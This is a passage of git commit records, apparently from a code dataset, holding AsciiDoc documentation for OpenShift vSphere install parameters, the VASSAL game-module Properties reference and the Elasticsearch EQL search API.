the vCenter instance with. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.clusterOSImage`\n|The location from which the installer downloads the {op-system} image. You must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with a SHA-256 checksum. For example, `\\https:\/\/mirror.openshift.com\/images\/rhcos-<version>-vmware.<architecture>.ova`.\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. 
The number of virtual sockets on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`.\n|Integer\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer\n|====\n\n
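As an illustrative sketch only (host names, credentials, and sizing values below are placeholders, not recommendations), the cluster and machine pool parameters above might be combined in the `platform` stanza of an `install-config.yaml` file as follows:\n\n[source,yaml]\n----\nplatform:\n  vsphere:\n    vCenter: vcenter.example.com\n    username: administrator@vsphere.local\n    password: <password>\n    datacenter: datacenter1\n    defaultDatastore: datastore1\n    network: VM_Network\n    cluster: vsphere-cluster\n    apiVIP: 192.168.100.5\n    ingressVIP: 192.168.100.6\n    cpus: 4\n    coresPerSocket: 2\n    memoryMB: 16384\n    osDisk:\n      diskSizeGB: 120\n----\n\nendif::vsphere,vmc[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:!vsphere:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e82de7410374bce3874aa997638580ae2d51086d","subject":"Fixed Properties reference docs.","message":"Fixed Properties reference docs.\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Properties.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Properties.adoc","new_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > 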
<<GamePiece.adoc#top,Game Piece>> > *Properties*#\n\n'''''\n\n=== Properties\n\nA Property is like a variable in programming: it has a _value_ which can be referenced by including its _name_ in <<Expression.adoc#top,Expressions>>, <<MessageFormat.adoc#top,Message Formats>> and other similar fields.\nMost types of Property have their values change through the course of the game.\nSome Properties can have their values set by commands provided in Game Pieces themselves; others have their values set by the system and cannot be changed from within the module.\n\nEach Game Piece has its own set of properties (each with a name and a value) that can be used for identification by various components.\nYou can add your own new properties to a Game Piece _explicitly_ by adding <<DynamicProperty.adoc#top,Dynamic Property>> traits to create values which can be changed during the course of the game, and <<PropertyMarker.adoc#top,Marker>> traits for properties whose values will remain constant.\nSystem-defined properties are also added _implicitly_ when other traits are added (see below). <<GlobalProperties.adoc#top,Global Properties>> can also be defined for a Zone, a Map or for the entire module.\nIf a referenced Property name is not defined in a Game Piece, VASSAL looks for the value in the Zone containing the piece, then in the Map containing the piece, then in the module.\n\nProperties can be matched using <<Expression.adoc#top,Expressions>> like _name == value_ for an exact match, _name != value_ for a non-match, or _name =~ value_ for a https:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[regular expression] match.\nFor properties that return a numeric value (e.g.\nthe level in a <<Layer.adoc#Properties,Layer>>) you can use _<_, _<=_, _>_, and _>=_. You can combine expressions using && for logical AND and || for a logical OR.\n\n
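For example, assuming a piece that defines a <<PropertyMarker.adoc#top,Marker>> property named _Nation_ and a numeric <<DynamicProperty.adoc#top,Dynamic Property>> named _Strength_ (illustrative names, not properties VASSAL defines itself), the following are all valid matching expressions:\n\n----\nNation == Germany\nNation != Germany\nLocationName =~ Forest|Swamp\nStrength >= 4 && Nation == Germany\n----\n\n*Components that use properties*\n\n* Any <<MessageFormat.adoc#top,Message Format>> defined in a Game Piece will substitute values for the properties defined on that Game Piece.\n\n* The <<Map.adoc#GlobalKeyCommand,Global Key Command>> component uses properties to determine which pieces will respond to the command.\n* The <<Map.adoc#GamePieceLayers,Game Piece Layers>> component uses properties to determine relative ordering when drawing pieces on the map.\n* The <<TriggerAction.adoc#top,Trigger Action>> trait uses properties to determine when to fire a Key Command or <<NamedKeyCommand.adoc#top,Named Key Command>>.\n* The <<Label.adoc#top,Text Label>> trait substitutes properties when setting the text of the label.\n* A <<ZonedGrid.adoc#Zone,Zone>> uses properties to specify a <<ZonedGrid.adoc#ZoneHighlighter,Zone Highlighter>>.\n\n*Properties defined by Game Pieces*\n\n* The <<BasicPiece.adoc#top,Basic Piece>> defines properties related to a piece's name, location, side, and whether it's selected.\n\n* The <<Layer.adoc#Properties,Layer>> trait defines properties related to the state of that Layer.\n* The <<Rotate.adoc#top,Rotate>> trait defines properties related to the current facing of the piece.\n\n* The <<Label.adoc#top,Text Label>> trait returns the value of the label as a property.\n* The <<PropertyMarker.adoc#top,Marker>> trait allows you to define your own static properties.\n* The <<DynamicProperty.adoc#top,Dynamic Property>> trait allows you to define your own changeable properties.\n\n* The <<MarkMoved.adoc#top,Mark When Moved>> trait sets a property when a piece has moved.\n* The <<Mask.adoc#Properties,Mask>> trait sets a property 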
when the piece is masked.\n* The <<Hideable.adoc#top,Invisible>> trait sets a property when the piece is invisible.\n\n* The <<PropertySheet.adoc#top,Property Sheet>> trait exposes a set of user-editable properties.\n\n*Properties defined by other components*\n\n* The <<GlobalProperties.adoc#top,Global Property>> component defines properties for a <<ZonedGrid.adoc#Zone,Zone>>, <<Map.adoc#top,Map>> or the <<GameModule.adoc#top,module>>.\n* The <<GlobalOptions.adoc#top,Global Options>> component allows you to tie property values to preferences settings.\n* The results of a roll by a <<GameModule.adoc#DiceButton,Dice Button>> are exposed as a property.\n* A <<Deck.adoc#top,Deck>> component exposes the number of cards remaining as a Map-level property.\n\n==== Handy Combined List of VASSAL-defined Properties for Game Pieces\n\n|===\n|Property |Trait |Description\n|*BasicName* |<<BasicPiece.adoc#top,Basic Piece>> |The basic name of the piece.\n|*ClickedX* |Basic Piece |Map X-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*ClickedY* |Basic Piece |Map Y-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*CurrentBoard* |Basic Piece |Current Board name or \"\" if not on a map.\n|*CurrentMap* |Basic Piece |Current Map name or \"\" if not on a map.\n|*CurrentX* |Basic Piece |Current X-coordinate of the piece.\n|*CurrentY* |Basic Piece |Current Y-coordinate of the piece.\n|*CurrentZone* |Basic Piece |Current Zone name if the current map has a <<ZonedGrid.adoc#top,multi-zoned grid>>, or \"\" if the piece is not in any zone, or not on a map.\n|*DeckName* |Basic Piece |Current Deck name if stacked in a <<Deck.adoc#top,Deck>>, or \"\" if not in a Deck.\n|*IgnoreGrid* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece ignores the map grid when moving.\n|*Immobile* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot be moved by drag and drop.\n|*Invisible* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to the current player.\n|*InvisibleToOthers* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to other players.\n|*LocationName* |Basic Piece |Name of the piece's current location, as determined by the map's <<ZonedGrid.adoc#Zone,Zone>> (if any) and grid settings.\n|*Moved* |<<MarkMoved.adoc#top,Mark When Moved>> |\"true\" if this piece has moved since the last time its movement history was cleared.\n|*NoStack* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot stack with other pieces.\n|*Obscured* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from the current player.\n|*ObscuredToOthers* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from other players.\n|*OldBoard* |Basic Piece |Board name prior to most recent movement.\n|*OldLocationName* |Basic Piece |Location name prior to most recent movement.\n|*OldMap* |Basic Piece |Map name prior to most recent movement.\n|*OldX* |Basic Piece |X coordinate prior to most recent movement.\n|*OldY* |Basic Piece |Y coordinate prior to most recent movement.\n|*OldZone* |Basic Piece |Zone name prior to most recent movement.\n|*PieceName* |Basic Piece |Full piece name including both Basic Name and all additional strings provided by traits.\n|*playerSide* |Basic Piece |Side of the current player (not the side of the piece).\n|*Restricted* |<<RestrictedAccess.adoc#top,Restricted Access>> |\"true\" if there are restrictions as to who can access this 
piece.\n|*Selected* |Basic Piece |\"true\" if the piece is currently selected.\n|*_<property_name>_* |<<PropertySheet.adoc#top,PropertySheet>> |The value of each property on the Property Sheet can be accessed via the property name.\n|*_<layername>__Active* |<<Layer.adoc#top,Layer>> |\"true\" if the Layer _<layername>_ is currently active.\n|*_<layername>__Image* |<<Layer.adoc#top,Layer>> |The image name of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Level* |<<Layer.adoc#top,Layer>> |The level number of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Name* |<<Layer.adoc#top,Layer>> |The level name of the currently active layer for _Layer_ _<layername>_.\n|*_<rotatename>__Facing* |<<Rotate.adoc#top,Can Rotate>> |The current facing number (1, 2, etc.) for the _Can Rotate_ trait _<rotatename>_.\n|*_<rotatename>__Degrees* |<<Rotate.adoc#top,Can Rotate>> |The current degrees of rotation for the _Can Rotate_ trait _<rotatename>_.\n|_<Property Name>_ |<<Label.adoc#top,Text Label>> |If the \"Property Name\" field in the trait is filled out, then a property with that name will be filled with the current value of the _Text Label_ trait's Text field.\n|*_<deckname>__numPieces* |<<Deck.adoc#top,Deck>> (Map level property) |Number of pieces\/\"cards\" in the _Deck_ _<deckname>_.\n|*_<deckname>___<expression_name>_* |<<Deck.adoc#top,Deck>> (Map level property) |The number of pieces\/\"cards\" for which the named expression evaluates to true in the _Deck_ _<deckname>_.\n|===\n","old_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Properties*#\n\n'''''\n\n=== Properties\n\n[width=\"100%\",cols=\"34%,33%,33%\",]\n|===\na|\nA Property is like a variable in programming: it has a _value_ which can be referenced by including its _name_ in <<Expression.adoc#top,Expressions>>, <<MessageFormat.adoc#top,Message Formats>> and other similar fields.\nMost types of Property have their values change through the course of the game.\nSome Properties can have their values set by commands provided in Game Pieces themselves; others have their values set by the system and cannot be changed from within the module.\n\nEach Game Piece has its own set of properties (each with a name and a value) that can be used for identification by various components.\nYou can add your own new properties to a Game Piece _explicitly_ by adding <<DynamicProperty.adoc#top,Dynamic Property>> traits to create values which can be changed during the course of the game and <<PropertyMarker.adoc#top,Marker>> traits for properties whose values will remain constant.\nSystem-defined properties are also added _implicitly_ when other traits are added (see below). 
<<GlobalProperties.adoc#top,Global Properties>> can also be defined for a Zone, a Map or for the entire module.\nIf a referenced Property name is not defined in a Game Piece, the VASSAL looks for the value in the Zone containing the piece, then in the Map containing the piece, then in the module.\n\nProperties can be matched using <<Expression.adoc#top,Expressions>> like _name == value_ for an exact match, _name != value_ for a non-match, or _name =~ value_ for a https:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[regular expression] match.\nFor properties that return a numeric value (e.g.\nthe level in a <<Layer.adoc#Properties,Layer)>> you can use _<_, _<=_, _>_, and _>=._ You can combine expressions using && for logical AND and || for a logical OR.\n\n*Components that use properties*\n\n* Any <<MessageFormat.adoc#top,Message Format>> defined in a Game Piece will substitute values for the properties defined on that Game Piece.\n\n* The <<Map.adoc#GlobalKeyCommand,Global Key Command>> component uses properties to determine which pieces will respond to the command.\n* The <<Map.adoc#GamePieceLayers,Game Piece Layers>> component uses properties to determine relative ordering when drawing pieces on the map.\n* The <<TriggerAction.adoc#top,Trigger Action>> trait uses properties to determine when to fire a Key Command or <<NamedKeyCommand.adoc#top,Named Key Command>> .\n* The <<Label.adoc#top,Text Label>> trait substitutes properties when setting the text of the label.\n* A <<ZonedGrid.adoc#Zone,Zone>> uses properties to specify a <<ZonedGrid.adoc#ZoneHighlighter,Zone Highlighter>>.\n\n*Properties defined by Game Pieces*\n\n* The <<BasicPiece.adoc#top,Basic Piece>> defines properties related to a piece's name, location, side, and whether it's selected.\n\n* The <<Layer.adoc#Properties,Layer>> trait defines properties related to the state of that Layer.\n* The <<Rotate.adoc#top,Rotate>> trait defines properties related to the current facing of the piece.\n\n* The <<Label.adoc#top,Text Label>> trait returns the value of the label as a property.\n* The <<PropertyMarker.adoc#top,Marker>> trait allows you to define your own static properties.\n* The <<DynamicProperty.adoc#top,Dynamic Property>> trait allows you to define your own changeable properties.\n\n* The <<MarkMoved.adoc#top,Mark When Moved>> trait sets a property when a piece has moved.\n* The <<Mask.adoc#Properties,Mask>> trait sets a property when the piece is masked.\n* The <<Hideable.adoc#top,Invisible>> trait sets a property when the piece is invisible.\n\n* The <<PropertySheet.adoc#top,Property Sheet>> trait exposes a set of user-editable properties.\n\n*Properties defined by other components*\n\n* The <<GlobalProperties.adoc#top,Global Property>> component defines properties for a <<ZonedGrid.adoc#Zone,Zone>>, <<Map.adoc#top,Map>> or the <<GameModule.adoc#top,module>>.\n* The <<GlobalOptions.adoc#top,Global Options>> component allows you to tie property values to preferences settings.\n* The results of a roll by a <<GameModule.adoc#DiceButton,Dice Button>> is exposed as a property\n* A <<Deck.adoc#top,Deck>> component exposes the number of cards remaining as a Map-level property.\n|===\n\n==== Handy Combined List of VASSAL-defined Properties for Game Pieces\n\n|===\n|Property |Trait |Description\n|*BasicName* |<<BasicPiece.adoc#top,Basic Piece>> |The basic name of the piece.\n|*ClickedX* |Basic Piece |Map X-coordinate where player last right-clicked on piece to bring up context menu (or 0 if 
never).\n|*ClickedY* |Basic Piece |Map Y-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*CurrentBoard* |Basic Piece |Current Board name or \"\" if not on a map.\n|*CurrentMap* |Basic Piece |Current Map name or \"\" if not on a map.\n|*CurrentX* |Basic Piece |Current X-coordinate of the piece.\n|*CurrentY* |Basic Piece |Current Y-coordinate of the piece.\n|*CurrentZone* |Basic Piece |Current Zone name if the current map has a <<ZonedGrid.adoc#top,multi-zoned grid>>, or \"\" if the piece is not in any zone, or not on a map.\n|*DeckName* |Basic Piece |Current Deck name if stacked in a <<Deck.adoc#top,Deck>>, or \"\" if not in a Deck.\n|*IgnoreGrid* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece ignores the map grid when moving.\n|*Immobile* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot be moved by drag and drop.\n|*Invisible* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to the current player.\n|*InvisibleToOthers* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to other players.\n|*LocationName* |Basic Piece |Name of the piece's current location, as determined by the map's <<ZonedGrid.adoc#Zone,Zone>> (if any) and grid settings.\n|*Moved* |<<MarkMoved.adoc#top,Mark When Moved>> |\"true\" if this piece has moved since the last time its movement history was cleared.\n|*NoStack* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot stack with other pieces.\n|*Obscured* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from the current player.\n|*ObscuredToOthers* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from other players.\n|*OldBoard* |Basic Piece |Board name prior to most recent movement.\n|*OldLocationName* |Basic Piece |Location name prior to most recent movement.\n|*OldMap* |Basic Piece |Map name prior to most recent movement.\n|*OldX* |Basic Piece |X coordinate prior to most recent movement.\n|*OldY* |Basic Piece |Y coordinate prior to most recent movement.\n|*OldZone* |Basic Piece |Zone name prior to most recent movement.\n|*PieceName* |Basic Piece |Full piece name including both Basic Name and all additional strings provided by traits.\n|*playerSide* |Basic Piece |Side of the current player (not the side of the piece).\n|*Restricted* |<<RestrictedAccess.adoc#top,Restricted Access>> |\"true\" if there are restrictions as to who can access this piece.\n|*Selected* |Basic Piece |\"true\" if the piece is currently selected.\n|*_<property_name>_* |<<PropertySheet.adoc#top,PropertySheet>> |The value of each property on the Property Sheet can be accessed via the property name.\n|*_<layername>__Active* |<<Layer.adoc#top,Layer>> |\"true\" if the Layer _<layername>_ is currently active.\n|*_<layername>__Image* |<<Layer.adoc#top,Layer>> |The image name of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Level* |<<Layer.adoc#top,Layer>> |The level number of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Name* |<<Layer.adoc#top,Layer>> |The level name of the currently active layer for _Layer_ _<layername>_.\n|*_<rotatename>__Facing* |<<Rotate.adoc#top,Can Rotate>> |The current facing number (1, 2, etc) for the _Can Rotate_ trait _<rotatename>_.\n|*_<rotatename>__Degrees* |<<Rotate.adoc#top,Can Rotate>> |The current degrees of rotation for the _Can Rotate_ trait _<name>_.\n|_<Property Name>_ |<<Label.adoc#top,Text Label>> |If the \"Property Name\" field in the trait is filled 
out, then a property with that name will be filled with the current value of the _Text Label_ trait's Text field.\n|*_<deckname>__numPieces* |<<Deck.adoc#top,Deck>> (Map level property) |Number of pieces\/\"cards\" in the _Deck_ _<deckname>_.\n|*_<deckname>___<expression_name>_* |<<Deck.adoc#top,Deck>> (Map level property) |The number of pieces\/\"cards\" for which the named expression evaluates to true in the _Deck_ _<deckname>_.\n|===\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"857c2d1cd49e66a1323ec9bb548b26b62b8383f3","subject":"[DOCS] Update `ignore_unavailable` default for EQL search API (#63210)","message":"[DOCS] Update `ignore_unavailable` default for EQL search API (#63210)\n\n","repos":"robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_file":"docs\/reference\/eql\/eql-search-api.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nbeta::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nEQL assumes each document in a data stream or index corresponds to an\nevent.\n\n[source,console]\n----\nGET \/my-index-000001\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name == \"regsvr32.exe\"\n \"\"\"\n}\n----\n\/\/ TEST[setup:sec_logs]\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<target>\/_eql\/search`\n\n`POST \/<target>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-required-fields>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-syntax-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<target>`::\n(Required, string)\nComma-separated list of data streams, indices, or <<indices-aliases,index\naliases>> used to limit the request. Accepts wildcard (`*`) expressions.\n+\nTo search all data streams and indices in a cluster, use\n`_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\n`ignore_unavailable`::\n(Optional, boolean) If `true`, missing or closed indices are not included in the\nresponse. Defaults to `true`.\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. 
Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` request body parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` request body\nparameter. If both parameters are specified, only the query parameter is used.\n====\n--\n\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` request\nbody parameter. If both parameters are specified, only the query parameter is\nused.\n====\n--\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If a data stream or index does not contain the\n`event.category` field, this value is required.\n+\nThe event category field must be mapped as a field type in the\n<<keyword,`keyword`>> family.\n\n`fetch_size`::\n(Optional, integer)\nMaximum number of events to search at a time for sequence queries. Defaults to\n`1000`.\n+\nThis value must be greater than `2` but cannot exceed the value of the\n<<index-max-result-window,`index.max_result_window`>> setting, which defaults to\n`10000`.\n+\nInternally, a sequence query fetches and paginates sets of events to search for\nmatches. This parameter controls the size of those sets. This parameter does not\nlimit the total number of events searched or the number of matching events\nreturned.\n+\nA greater `fetch_size` value often increases search speed but uses more memory.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`keep_alive`::\n+\n--\n(Optional, <<time-units,time value>>)\nPeriod for which the search and its results are stored on the cluster. 
Defaults\nto `5d` (five days).\n\nWhen this period expires, the search and its results are deleted, even if the\nsearch is still ongoing.\n\nIf the <<eql-search-api-keep-on-completion,`keep_on_completion`>> parameter is\n`false`, {es} only stores <<eql-search-async,async searches>> that do not\ncomplete within the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter, regardless of this value.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_alive` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-keep-on-completion]]\n`keep_on_completion`::\n+\n--\n(Optional, boolean)\nIf `true`, the search and its results are stored on the cluster.\n\nIf `false`, the search and its results are stored on the cluster only if the\nrequest does not complete during the period set by the\n<<eql-search-api-wait-for-completion-timeout,`wait_for_completion_timeout`>>\nparameter. Defaults to `false`.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `keep_on_completion` query parameter.\nIf both parameters are specified, only the query parameter is used.\n====\n--\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n\n`size`::\n(Optional, integer or float)\nFor <<eql-basic-syntax,basic queries>>, the maximum number of matching events to\nreturn.\n+\nFor <<eql-sequences,sequence queries>>, the maximum number of matching sequences\nto return.\n+\nDefaults to `10`. This value must be greater than `0`.\n+\nNOTE: You cannot use <<eql-pipe-ref,pipes>>, such as `head` or `tail`, to exceed\nthis value.\n\n[[eql-search-api-tiebreaker-field]]\n`tiebreaker_field`::\n(Optional, string)\nField used to sort events with the same\n<<eql-search-api-timestamp-field,timestamp field>> value. Defaults to\n`event.sequence`, as defined in the {ecs-ref}\/ecs-event.html[Elastic Common\nSchema (ECS)].\n+\nBy default, matching events in the search response are sorted by timestamp,\nconverted to milliseconds since the {wikipedia}\/Unix_time[Unix\nepoch], in ascending order. If two or more events share the same timestamp, this\nfield is used to sort the events in ascending, lexicographic order.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If a data stream or index\ndoes not contain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the {wikipedia}\/Unix_time[Unix epoch], in\nascending order.\n\nThe timestamp field should be mapped as a <<date,`date`>>. The\n<<date_nanos,`date_nanos`>> field type is not supported.\n--\n\n[[eql-search-api-wait-for-completion-timeout]]\n`wait_for_completion_timeout`::\n+\n--\n(Optional, <<time-units,time value>>)\nTimeout duration to wait for the request to finish. Defaults to no\ntimeout, meaning the request waits for complete search results.\n\nIf this parameter is specified and the request completes during this period,\ncomplete search results are returned.\n\nIf the request does not complete during this period, the search becomes an\n<<eql-search-async,async search>>.\n\n[IMPORTANT]\n====\nYou can also specify this value using the `wait_for_completion_timeout` query\nparameter. 
